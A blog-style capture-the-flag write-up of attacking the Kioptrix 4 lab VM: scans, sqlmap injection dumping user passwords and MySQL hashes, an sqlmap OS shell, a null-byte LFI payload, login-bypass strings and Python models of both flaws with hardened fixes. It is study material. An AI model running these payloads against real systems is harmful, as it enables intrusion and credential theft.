Wednesday, 20 November 2013

Kioptrix 4

root@kali:~# netdiscover

 Currently scanning: 192.168.88.0/16   |   Screen View: Unique Hosts                                                              

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180

 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.100  08:00:27:23:30:51    01    060   CADMUS COMPUTER SYSTEMS
 192.168.56.103  08:00:27:e0:cd:64    01    060   CADMUS COMPUTER SYSTEMS
          
root@kali:~# unicornscan 192.168.56.103
TCP open                http[   80]        from 192.168.56.103  ttl 64

root@kali:~# nikto -host 192.168.56.103
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.103
+ Target Hostname:    192.168.56.103
+ Target Port:        80
+ Start Time:         2013-11-19 14:22:55 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 6544 items checked: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2013-11-19 14:23:06 (GMT1) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb http://192.168.56.103/

-----------------
DIRB v2.21   
By The Dark Raver
-----------------
START_TIME: Tue Nov 19 14:23:42 2013
URL_BASE: http://192.168.56.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.56.103/ ----
+ http://192.168.56.103/cgi-bin/ (CODE:403|SIZE:329)
==> DIRECTORY: http://192.168.56.103/images/
+ http://192.168.56.103/index (CODE:200|SIZE:1255)
+ http://192.168.56.103/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.56.103/john/
+ http://192.168.56.103/logout (CODE:302|SIZE:0)
+ http://192.168.56.103/member (CODE:302|SIZE:220)
+ http://192.168.56.103/server-status (CODE:403|SIZE:334)

---- Entering directory: http://192.168.56.103/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.56.103/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
-----------------
DOWNLOADED: 4592 - FOUND: 6

Mantra against http://192.168.56.103/

Login form

Load URL:
http://192.168.56.103/checklogin.php

Enable Post data:
myusername=admin&mypassword='pass&Submit=Login

Execute

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28

root@kali:~# sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" --dbs

available databases [3]:
[*] information_schema
[*] members
[*] mysql

...

sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" -D members -T members -C id,password,username --dump

+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
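The single quote in mypassword breaks the query and produces the mysql_num_rows() warning, which is what gave the injection away. The Python below is an added example, not code from this page or from the Kioptrix 4 VM (its checklogin.php is not shown here): it models the assumed shape of that login check, a query built by string concatenation, with SQLite standing in for MySQL so it runs offline, and the two member rows from the dump above as data. It shows the stray-quote probe failing, two classic bypass payloads returning every member, and the same check with bound parameters, where neither works. The query shape and the SQLite stand-in are assumptions.

```python
"""Login-bypass SQL injection modelled after the error on this page.

Added example, not code from the Kioptrix 4 VM: checklogin.php itself is not
shown there.  The mysql_num_rows() warning after a stray quote is the classic
symptom of a query built by string concatenation, which is what this model
assumes (labelled assumption).  SQLite stands in for MySQL so the script runs
offline; the rows are the two that sqlmap dumped from members.members.
"""
import sqlite3

# Constructed fixture: the members table as dumped by sqlmap on this page.
SAMPLE_MEMBERS = [
    (1, "john", "MyNameIsJohn"),
    (2, "robert", "ADGAdsafdfwt4gadfga=="),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?, ?)", SAMPLE_MEMBERS)
    return con


def login_vulnerable(con, username, password):
    """Query assembled from the form fields (assumed shape).  Returns the
    matched usernames, or None when the SQL fails to parse: the PHP side then
    hands an invalid result resource to mysql_num_rows(), the warning above."""
    sql = ("SELECT username FROM members WHERE username='%s' AND password='%s'"
           % (username, password))
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.OperationalError:
        return None


def login_fixed(con, username, password):
    """Same check with bound parameters: the quote is data, never syntax."""
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    return [row[0] for row in con.execute(sql, (username, password))]


# Three inputs worth trying against any login form:
PROBE_QUOTE = "'pass"              # the page's first test: breaks the query
BYPASS_TAUTOLOGY = "' OR '1'='1"   # password clause becomes always true
BYPASS_COMMENT = "' OR 1=1 -- "    # comments out the rest of the WHERE clause


def demo():
    con = make_db()
    return {
        "probe": login_vulnerable(con, "admin", PROBE_QUOTE),           # None: SQL error
        "valid": login_vulnerable(con, "john", "MyNameIsJohn"),         # ['john']
        "tautology": login_vulnerable(con, "admin", BYPASS_TAUTOLOGY),  # every member
        "comment": login_vulnerable(con, "admin", BYPASS_COMMENT),      # every member
        "fixed_probe": login_fixed(con, "admin", PROBE_QUOTE),          # []: no error
        "fixed_tautology": login_fixed(con, "admin", BYPASS_TAUTOLOGY), # []
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:16} -> {result}")
```

The probe result is the interesting one for detection: a login check that turns a quote into a database error is the same signal sqlmap keys on when it fingerprints the injection, and it disappears entirely once the query is parameterised.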


http://192.168.56.103/john/

http://192.168.56.103/robert/

http://192.168.56.103/john/john.php
http://192.168.56.103/robert/robert.php

sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" -D mysql -T user -C Host,User,Password --dump

+-----------+------------------+-------------------------------------------+
| Host      | User             | Password                                  |
+-----------+------------------+-------------------------------------------+
| 127.0.0.1 | root             |                                           |
| Kioptrix4 |                  |                                           |
| Kioptrix4 | root             |                                           |
| localhost |                  |                                           |
| localhost | debian-sys-maint | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
| localhost | root             | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
+-----------+------------------+-------------------------------------------+

sqlmap -u "http://192.168.56.103/checklogin.php" --data="myusername=admin&mypassword=pass&Submit=Login" --os-shell

os-shell> cat /etc/passwd
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
---

os-shell> cat /etc/group
...
admin:x:115:loneferret
...

os-shell> ls /var/www
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
checklogin.php
database.sql
images
index.php
john
login_success.php
logout.php
member.php
robert
tmpbjbbq.php
tmpbtahr.php
tmpueovq.php
tmpuxztg.php

os-shell> cat /var/www/login_success.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
session_start();
if(!session_is_registered(myusername)){
    header("location:index.php");
}else{
    $id=$_GET['username'];
     header("location:member.php?username=$id");
}
?>

os-shell> cat /var/www/member.php
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
<?php
session_start();
if(!session_is_registered(myusername)){
        header("location:index.php");
}

$page = $_GET['username'];

//$page = preg_replace('/etc/','',$page,1) . ".php";
$page = preg_replace('/etc/','',$page,1);

if(file_exists($page)){
    $memPage = $page . "/" . $page . ".php";
    include($memPage);
}else{
    print ("User " .$page.'<br><br>');
    print("Oups, something went wrong with your member's page account.<br>Please contact your local Administrator<br> to fix the issue.");
    print ('<br>');
    print('<form method="link" action="index.php"><input type=submit value="Back"></form>');
}
?>
---
...
http://192.168.56.103/member.php?username=/etc/etc/passwd%00

This is an LFI. preg_replace() strips only the first "etc", so /etc/etc/passwd becomes //etc/passwd (which the kernel resolves as /etc/passwd), and the trailing %00 is a null byte: on this PHP 5.2.4 build file_exists() and include() stop reading the path at the null, so the "/<page>.php" suffix that member.php appends is cut off and the file is included as-is. member.php first checks for a logged-in session, which the credentials dumped above provide.
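The Python below is an added example, not code from this page or from the VM: it re-creates member.php's path handling (first "etc" stripped, then <page>/<page>.php included) together with the null-byte truncation that PHP 5.2.4 inherits from libc (an assumption, labelled in the code), so the /etc/etc/passwd%00 trick can be stepped through offline against a throwaway directory tree instead of the real /etc. craft_payload() generalises the trick to any target path (it inserts the decoy "etc" without the extra slash the page's payload uses; both forms work because "//" is a single separator on POSIX), and member_page_hardened() is one safe replacement: identifier-only names, a fixed path template and a realpath containment check. The fixture files are constructed for the example.

```python
"""Trace of the member.php local file inclusion, as an added example.

Not code from the Kioptrix 4 VM: this re-creates the PHP's path handling in
Python so the /etc/etc/passwd%00 trick can be stepped through offline.
Assumption (labelled): PHP 5.2.4 passes paths to libc as NUL-terminated
strings, so file_exists() and include() see nothing past the first %00.
"""
import os
import re
import tempfile
from urllib.parse import unquote


def _c_string(path):
    """What libc sees: the bytes before the first NUL (PHP < 5.3.4 behaviour, assumed)."""
    return path.split("\0", 1)[0]


def member_page_vulnerable(docroot, username):
    """Mirror of member.php: strip the first 'etc', then include <page>/<page>.php.
    Returns (path include() opens, its contents), or None where the VM prints
    'Oups, something went wrong'."""
    page = unquote(username)                  # $_GET['username'] arrives URL-decoded
    page = re.sub("etc", "", page, count=1)   # preg_replace('/etc/','',$page,1): regex is just 'etc'
    # file_exists($page): relative names resolve under the docroot, absolute ones as given
    if not os.path.exists(_c_string(os.path.join(docroot, page))):
        return None
    mem_page = page + "/" + page + ".php"     # $memPage = $page . "/" . $page . ".php"
    target = _c_string(os.path.join(docroot, mem_page))   # the NUL cuts the suffix off
    with open(target) as fh:
        return target, fh.read()


def craft_payload(target):
    """Attacker side, generalised: put a decoy 'etc' in front of the first 'etc'
    so preg_replace() eats the decoy, then append %00 to drop '/<page>.php'."""
    i = target.find("etc")
    if i >= 0:
        target = target[:i] + "etc" + target[i:]
    return target + "%00"


def member_page_hardened(docroot, username):
    """Safe replacement (added here, not on the VM): identifier-only names, a
    fixed path template, and a realpath check that the file stays in the docroot."""
    if not re.fullmatch(r"[A-Za-z0-9_]{1,32}", username):
        raise ValueError("invalid member name")
    base = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(base, username, username + ".php"))
    if os.path.dirname(os.path.dirname(target)) != base or not os.path.isfile(target):
        raise ValueError("member page not found")
    with open(target) as fh:
        return target, fh.read()


def build_demo():
    """Constructed fixture: throwaway docroot with john/john.php plus a fake
    etc/passwd next to it, so nothing touches the real /etc."""
    root = tempfile.mkdtemp()
    docroot = os.path.join(root, "www")
    os.makedirs(os.path.join(docroot, "john"))
    with open(os.path.join(docroot, "john", "john.php"), "w") as fh:
        fh.write("<?php echo 'john member page'; ?>")
    os.makedirs(os.path.join(root, "etc"))
    secret = os.path.join(root, "etc", "passwd")
    with open(secret, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
    return docroot, secret


def run_demo():
    docroot, secret = build_demo()
    payload = craft_payload(secret)
    lfi_path, lfi_content = member_page_vulnerable(docroot, payload)
    try:
        member_page_hardened(docroot, payload)
        hardened_blocked = False
    except ValueError:
        hardened_blocked = True
    return {
        "normal": member_page_vulnerable(docroot, "john")[1],
        "missing": member_page_vulnerable(docroot, "nobody"),
        "generic_payload": craft_payload("/etc/passwd"),   # '/etcetc/passwd%00'
        "lfi_hits_secret": os.path.samefile(lfi_path, secret),
        "lfi_first_line": lfi_content.splitlines()[0],
        "hardened_blocked": hardened_blocked,
        "hardened_normal": member_page_hardened(docroot, "john")[1],
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key:17} -> {value!r}")
```

Two things the trace makes visible that the PHP alone does not: the single-replacement preg_replace() is a filter an attacker defeats by supplying the banned token twice, and the null byte is what turns a "<page>/<page>.php" template into an arbitrary-file read. The hardened variant removes both levers by validating the name as an identifier before it ever reaches the filesystem.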

os-shell> netstat -nap | grep tcp
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      4375/sh        
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -              
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -              
tcp        0      0 192.168.56.103:80       192.168.56.101:43597    ESTABLISHED 4375/sh        
---

root@kali:/var/www/phpshells# nmap -sS 192.168.56.103

Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-19 15:26 CET
Nmap scan report for 192.168.56.103
Host is up (0.00025s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:E0:CD:64 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 15.42 seconds

root@kali:/var/www/phpshells# ssh john@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.103' (RSA) to the list of known hosts.
john@192.168.56.103's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ pwd
*** unknown command: pwd
john:~$ ls
john:~$ id
*** unknown command: id
john:~$ ls
john:~$ ls /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.


os-shell> ls -al /home/john
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
total 28
drwxr-xr-x 2 john john 4096 Feb  4  2012 .
drwxr-xr-x 5 root root 4096 Feb  4  2012 ..
-rw------- 1 john john   61 Feb  4  2012 .bash_history
-rw-r--r-- 1 john john  220 Feb  4  2012 .bash_logout
-rw-r--r-- 1 john john 2940 Feb  4  2012 .bashrc
-rw-r--r-- 1 john john  118 Feb  4  2012 .lhistory
-rw-r--r-- 1 john john  586 Feb  4  2012 .profile

os-shell> cat /home/john/.profile
do you want to retrieve the command standard output? [Y/n/a]
command standard output:
---
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.

# the default umask is set in /etc/profile
#umask 022

# if running bash
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
    . "$HOME/.bashrc"
    fi
fi

# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
    PATH="$HOME/bin:$PATH"
fi

john:~$ echo $PATH
*** forbidden path -> "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games"
*** Kicked out
Connection to 192.168.56.103 closed.

root@kali:/var/www/phpshells# ssh robert@192.168.56.103
robert@192.168.56.103's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
robert:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls


robert:~$ lpath
Allowed:
 /home/robert


That's all. I have not found the solution. My current goal was to identify the vulnerabilities. Currently, my knowledge is not enough for privilege escalation.
